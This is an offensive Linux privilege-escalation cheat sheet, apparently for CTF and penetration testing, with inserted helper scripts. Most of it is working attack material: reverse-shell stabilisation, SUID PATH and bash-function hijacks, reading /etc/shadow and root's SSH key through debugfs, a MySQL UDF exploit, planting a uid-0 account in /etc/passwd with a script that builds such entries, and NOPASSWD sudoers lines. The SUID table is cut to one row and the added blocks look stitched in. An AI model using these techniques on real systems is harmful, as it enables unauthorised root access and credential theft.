python -c 'import pty; pty.spawn("/bin/bash")'   # use python3 -c on hosts without a python binary
Ctrl-Z
# In Kali: note the number of rows and columns of the current terminal window
$ stty -a
# Next put the local terminal into raw mode with echo off, so that TAB completion, arrow keys and Ctrl-C are passed through to the remote shell instead of being handled locally
$ stty raw -echo
$ fg
# In the reverse shell: set the size to match the values noted from stty -a, otherwise full-screen tools (vim, less, top) will draw incorrectly
$ stty rows <num> columns <cols>
# Finally
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
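The one step above that is easy to get wrong is copying the rows and columns by hand. The following helper, an added example that is not part of the original page, parses the stty -a dump from the Kali terminal and prints the exact stty command to type into the reverse shell after fg. It assumes GNU stty output ("rows 50; columns 200;") or BSD/macOS output ("50 rows; 200 columns;"); the sample dumps in the usage are constructed.

```bash
#!/bin/bash
# Added example: derive "stty rows N columns M" from a "stty -a" dump.

# tty_size_from_stty DUMP -> "ROWS COLS" (exit 1 if either value is missing).
# Handles GNU ("rows 50; columns 200;") and BSD ("50 rows; 200 columns;") layouts.
tty_size_from_stty() {
    local dump="$1" rows cols
    rows=$(printf '%s\n' "$dump" \
        | grep -oE 'rows[[:space:]]+[0-9]+|[0-9]+[[:space:]]+rows' \
        | grep -oE '[0-9]+' | head -n1)
    cols=$(printf '%s\n' "$dump" \
        | grep -oE 'columns[[:space:]]+[0-9]+|[0-9]+[[:space:]]+columns' \
        | grep -oE '[0-9]+' | head -n1)
    [ -n "$rows" ] && [ -n "$cols" ] || return 1
    printf '%s %s\n' "$rows" "$cols"
}

# fix_tty_cmd DUMP -> the command to paste into the upgraded reverse shell.
fix_tty_cmd() {
    local size rows cols
    size=$(tty_size_from_stty "$1") || return 1
    rows=${size% *}
    cols=${size#* }
    printf 'stty rows %s columns %s\n' "$rows" "$cols"
}

# Live use on the attacker side (only when a real terminal is attached):
# run this before "stty raw -echo; fg" and paste the printed line remotely.
if [ -t 0 ]; then
    fix_tty_cmd "$(stty -a)"
fi

# Constructed sample, as a GNU stty would print it:
#   fix_tty_cmd 'speed 38400 baud; rows 50; columns 200; line = 0;'
#   -> stty rows 50 columns 200
```

Follow the printed command with the reset and export TERM / SHELL lines exactly as listed above; those do not depend on the terminal size.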
Start with the basics
Who am I and what groups do I belong to?
id
Who else is on this box (lateral movement)?
ls -la /home
cat /etc/passwd
What kernel version and distro are we working with here?
uname -a
cat /etc/issue
What new processes are running on the server (thanks to IPPSEC for the script!):
#!/bin/bash
# Snapshot the process tree once a second and print only the lines that changed.
# The monitoring commands themselves (ps, sleep and this script) are filtered out.
# Loop by line
IFS=$'\n'
old_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v "$0")
while true; do
    new_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v "$0")
    # lines starting with < have disappeared, lines starting with > are new
    diff <(echo "$old_process") <(echo "$new_process") | grep '^[<>]'
    sleep 1
    old_process=$new_process
done
Who can execute code as root (you will probably get permission denied, since /etc/sudoers is normally mode 0440)?
cat /etc/sudoers
Can I execute code as root (you will need the user's password unless the entry is marked NOPASSWD)?
sudo -l
What executables have the SUID bit set, and therefore run with their owner's (root's) privileges whoever executes them? Any of these variants will do:
find / -type f -user root -perm /u+s -ls 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
Do any of the SUID binaries run commands that are vulnerable to file path manipulation? The tell is a bare command name (here mail) in the strings output: a command called by name is looked up through PATH, so a file of the same name in a directory we control runs instead. A call to an absolute path such as /usr/bin/mail cannot be hijacked this way.
strings /usr/local/bin/binaryelf
mail
echo "/bin/sh" > /tmp/mail
chmod +x /tmp/mail
cd /tmp
export PATH=.
/usr/local/bin/binaryelf
Note: if the resulting shell is not root, the shell dropped the effective uid on startup; use bash -p, or a small compiled wrapper that calls setuid(0) before exec'ing a shell, as the payload instead.
Do any of the SUID binaries run commands by absolute path that are vulnerable to Bash function manipulation? This only works on old bash releases (before 4.2-048) that import exported functions whose names contain a slash; current bash rejects such names.
strings /usr/bin/binaryelf
/usr/bin/mail
function /usr/bin/mail() { /bin/sh; }
export -f /usr/bin/mail
/usr/bin/binaryelf
Can I write files into a folder containing a SUID bit file?
It might be possible to take advantage of a '.' in the PATH or of the IFS (Internal Field Separator) exploit, where IFS is set to "/" so that the shell splits an absolute path such as /bin/mail into the words bin and mail and then looks the first word up through PATH.
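The PATH hijack in the two questions above can be rehearsed without a real SUID binary. The script below is an added example, not code from the original page: a stand-in "victim" script plays the role of /usr/local/bin/binaryelf and calls mail either by bare name (hijackable) or by absolute path (not hijackable), and a fake mail is dropped into a directory that is put first in PATH. Everything is built under a temporary directory and nothing is SUID; the directory names and the marker strings "hijacked" and "real-mail" are constructed for the demonstration.

```bash
#!/bin/bash
# Added example: PATH hijack of a command called by name vs. by absolute path.

# build_victim DIR MODE  (MODE = relative | absolute)
# Creates DIR/realbin/mail (the legitimate command) and DIR/victim, which
# behaves like a SUID program doing system("mail") or system("/usr/bin/mail").
build_victim() {
    local dir="$1" mode="$2" call="mail"
    [ "$mode" = absolute ] && call="$dir/realbin/mail"
    mkdir -p "$dir/realbin"
    printf '#!/bin/sh\necho real-mail >> "%s/log"\n' "$dir" > "$dir/realbin/mail"
    printf '#!/bin/sh\n%s\n' "$call" > "$dir/victim"
    chmod +x "$dir/realbin/mail" "$dir/victim"
}

# run_hijack DIR: stage the attack exactly as the text does (a fake mail in a
# directory we control, placed first in PATH), run the victim, report what ran.
run_hijack() {
    local dir="$1"
    mkdir -p "$dir/evil"
    printf '#!/bin/sh\necho hijacked >> "%s/log"\n' "$dir" > "$dir/evil/mail"
    chmod +x "$dir/evil/mail"
    : > "$dir/log"
    # The text uses "export PATH=."; prepending keeps the rest of the system usable.
    PATH="$dir/evil:$dir/realbin:$PATH" "$dir/victim"
    cat "$dir/log"
}

# hijack_result MODE -> "hijacked" when the bare-name call was redirected,
# "real-mail" when the absolute-path call ran the genuine command.
hijack_result() {
    local mode="$1" dir
    dir=$(mktemp -d)
    build_victim "$dir" "$mode"
    run_hijack "$dir"
    rm -rf "$dir"
}

# Against a real SUID binary the fake mail should exec "bash -p" or a compiled
# setuid(0) wrapper rather than plain /bin/sh, which drops the effective uid.
# hijack_result relative -> hijacked ; hijack_result absolute -> real-mail
```

The absolute-path case is the check to run before spending time on a binary: if every command name in the strings output starts with a slash, PATH manipulation will not help and the bash-function or IFS variants are the only shell-level options.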
If any of the following commands appear on the list of SUID or sudo commands, they can be used for privilege escalation:

SUID / sudo executable   Priv esc command (prefix with sudo if you are using sudo for priv esc)
(ALL : ALL) ALL          You can run any command as root: sudo su -   or   sudo /bin/bash

Note: You can find an incredible list of Linux binaries that can lead to privilege escalation at the GTFOBins project website here: https://gtfobins.github.io/
Can I access services that are running as root on the local network (or bound only to localhost, which is why they did not show up in the external port scan)?
netstat -antup   (or ss -antup on hosts without netstat)
ps aux | grep root
Network service running as root   Exploit actions
mysql                             raptor_udf2 exploit (0xdeadbeef.info/exploits/raptor_udf2.c): compile it to a shared object, load it into a table with insert into foo values(load_file('/home/smeagol/raptor_udf2.so')); then dump it into the MySQL plugin directory and register it as a UDF that runs shell commands with the privileges of the mysqld process (root here)
apache                            drop a reverse shell script on to the webserver
nfs                               no_root_squash parameter on the export: files written as root from the client keep root ownership, so a SUID shell can be planted on the share. Or, if you create the same user name and matching user id as the remote share, you can gain access to the files and write new files to the share
Are any of the discovered credentials being reused by multiple accounts?
su - username
sudo -s
Are there any cron jobs running? Look for jobs that run as root but execute a script or binary we can write to.
cat /etc/crontab
ls -la /etc/cron.d /etc/cron.hourly /etc/cron.daily /etc/cron.weekly
What files have been modified most recently?
find /etc -type f -printf '%TY-%Tm-%Td %TT %p\n' | sort -r
find /home -type f -mmin -60
find / -type f -mtime -2
Is the user a member of the disk group (which gives read access to the raw block devices) and can we read the contents of the file system, bypassing file permissions entirely? Point debugfs at the partition that holds the root filesystem (check lsblk or mount; /dev/sda is the whole disk, the filesystem is usually on /dev/sda1 or similar).
debugfs /dev/sda1
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow
Is the user a member of the video group and can we read the framebuffer (a screenshot of the console)?
cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size
Where can we WRITE?
What files can I write to? (Pseudo and system filesystems are pruned to keep the output readable.)
find / -path /sys -prune -o -path /proc -prune -o -path /usr -prune -o -path /lib -prune -o -type f -writable -print 2>/dev/null
What folders can I write to? (Drop var from the prune list if you also want /var/www and the cron spools.)
find / -regextype posix-extended -regex "/(sys|srv|proc|usr|lib|var)" -prune -o -type d -writable -print 2>/dev/null
Writable folder / file   Priv esc command
/home/USER/              Create an SSH key pair and copy the public key into /home/USER/.ssh/authorized_keys (with the default StrictModes, sshd ignores the file unless .ssh is mode 0700 and the file 0600), then SSH into the account.
/etc/passwd              Manually add a user with a password of "password" using the following syntax. The second field is an MD5-crypt hash; a hash placed here is used directly instead of the one in /etc/shadow:
                         user:$1$xtTrK/At$Ga7qELQGiIklZGDhc6T5J0:1000:1000:,,,:/home/user:/bin/bash
                         You can even escalate to the root user in some cases by giving the new entry uid and gid 0:
                         admin:$1$xtTrK/At$Ga7qELQGiIklZGDhc6T5J0:0:0:,,,:/root:/bin/bash
Root SSH key             If root can log in via SSH, then you might be able to find a method of adding a key to the /root/.ssh/authorized_keys file. Check first:
                         cat /etc/ssh/sshd_config | grep PermitRootLogin
/etc/sudoers             Add sudoers: if we can write arbitrary files to the host as root, it is possible to grant a user full sudo rights like so. Keep the file root-owned, mode 0440 and syntactically valid (visudo -c), otherwise sudo refuses to run. A change to /etc/sudoers applies on the next sudo call; only membership of the %sudo group (added via /etc/group) needs a logout and login again as myuser:
                         root    ALL=(ALL:ALL) ALL
                         %sudo   ALL=(ALL:ALL) ALL
                         myuser  ALL=(ALL) NOPASSWD:ALL
/etc/shadow              Set root password: we can also change the root password on the host if we can write to any file as root, by replacing the hash in the second field of the root line with one we generated ourselves (openssl passwd -6, or -1 on old systems).
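The /etc/passwd row above reuses one fixed hash; in practice you generate your own and you want to be sure the line is well formed before appending it, because a malformed entry can break logins for everyone (including you). The helper below is an added example, not code from the original page: it builds an entry with openssl passwd -1 (the same $1$ MD5-crypt format as the page's example; use -6 for SHA-512 where supported) and checks the seven-field layout, numeric uid/gid, absolute home and shell, and a crypt-style hash. It assumes openssl is installed on the attacking machine; the user names, ids and password in the usage are constructed.

```bash
#!/bin/bash
# Added example: build and validate an /etc/passwd entry for the writable-passwd case.

# passwd_line NAME UID GID HOME SHELL PASSWORD -> one /etc/passwd entry with a
# freshly generated MD5-crypt hash in the password field (exit 1 if openssl fails).
passwd_line() {
    local name="$1" uid="$2" gid="$3" home="$4" shell="$5" pass="$6" hash
    hash=$(printf '%s\n' "$pass" | openssl passwd -1 -stdin) || return 1
    printf '%s:%s:%s:%s:,,,:%s:%s\n' "$name" "$hash" "$uid" "$gid" "$home" "$shell"
}

# check_passwd_line LINE -> 0 if LINE is safe to append, 1 otherwise.
# Requires: exactly 7 colon-separated fields, a portable user name, a crypt
# hash ($1$, $5$ or $6$) in field 2, numeric uid/gid, absolute home and shell.
check_passwd_line() {
    printf '%s\n' "$1" | awk -F: '
        NF != 7                                   { exit 1 }
        $1 !~ /^[a-z_][a-z0-9_-]*$/               { exit 1 }
        index($2,"$1$") != 1 && index($2,"$5$") != 1 && index($2,"$6$") != 1 { exit 1 }
        $3 !~ /^[0-9]+$/ || $4 !~ /^[0-9]+$/      { exit 1 }
        $6 !~ /^\// || $7 !~ /^\//                { exit 1 }
        { exit 0 }'
}

# is_root_entry LINE -> 0 if the entry has uid 0 (the "admin" escalation case).
is_root_entry() {
    [ "$(printf '%s\n' "$1" | awk -F: '{print $3}')" = "0" ]
}

# Usage (constructed values):
#   line=$(passwd_line admin 0 0 /root /bin/bash password)
#   check_passwd_line "$line" && is_root_entry "$line" && echo "$line" >> /etc/passwd
```

After appending, confirm the entry with getent passwd admin and log in with su - admin; if the system refuses the password, the target's libc may not accept the hash type, so regenerate with a different openssl passwd option.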
It is always a great idea to automate the enumeration process once you understand what you are looking for.
LinEnum.sh
LinEnum is a handy method of automating Linux enumeration. It is written as a shell script and does not require any other interpreter (Python, Perl etc.), which allows you to run it file-lessly in memory by piping it straight from curl or wget into bash.
First we need to clone a copy to our local Kali Linux machine (the project is hosted at https://github.com/rebootuser/LinEnum) and serve it over HTTP from there.
Then fetch it from the target and the enumeration script will run on the remote machine without ever touching its disk.
CTF Machine Tactics
Often it is easy to identify when a machine was created by the date / time of file edits: the bulk of the files in /etc, /home and /root will carry a timestamp from the day the box was built, and the files the author touched afterwards (the intended path to root) stand out.
We can create a list of all the files with a modify time in that timeframe using find with a pair of -newermt tests, one for the start of the window and a negated one for its end.
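The window search described above, together with the recently-modified-file commands in the enumeration list, as an added example that is not part of the original page. It assumes GNU find (for -newermt) and GNU touch (for -d), as found on Kali and most Linux targets; the scratch files and dates in the demo are constructed.

```bash
#!/bin/bash
# Added example: list files whose modification time falls inside a window.

# files_modified_between DIR START END -> sorted paths under DIR whose mtime is
# after START and not after END. START/END are date strings GNU find accepts,
# e.g. "2017-03-01" or "2017-03-01 12:00".
files_modified_between() {
    local dir="$1" start="$2" end="$3"
    find "$dir" -type f -newermt "$start" ! -newermt "$end" 2>/dev/null | sort
}

# demo_window -> the file names from a scratch tree that fall inside one day.
# Three files are created with mtimes before, inside and after the window.
demo_window() {
    local dir
    dir=$(mktemp -d)
    touch -d '2017-02-28 10:00' "$dir/old.txt"
    touch -d '2017-03-01 12:00' "$dir/in-window.txt"
    touch -d '2017-03-03 09:00' "$dir/later.txt"
    files_modified_between "$dir" '2017-03-01' '2017-03-02' | sed 's#.*/##'
    rm -rf "$dir"
}

# On a target, once "ls -lt /etc | tail" has shown the build date, run e.g.
#   files_modified_between / '2017-03-01' '2017-03-03'
# and read the list for config files, scripts and home-directory files the
# author edited after the base install.
```

Only files are listed; add -o -type d or drop -type f if the directories themselves are of interest, and widen the window by a day on each side when the box's timezone is unknown.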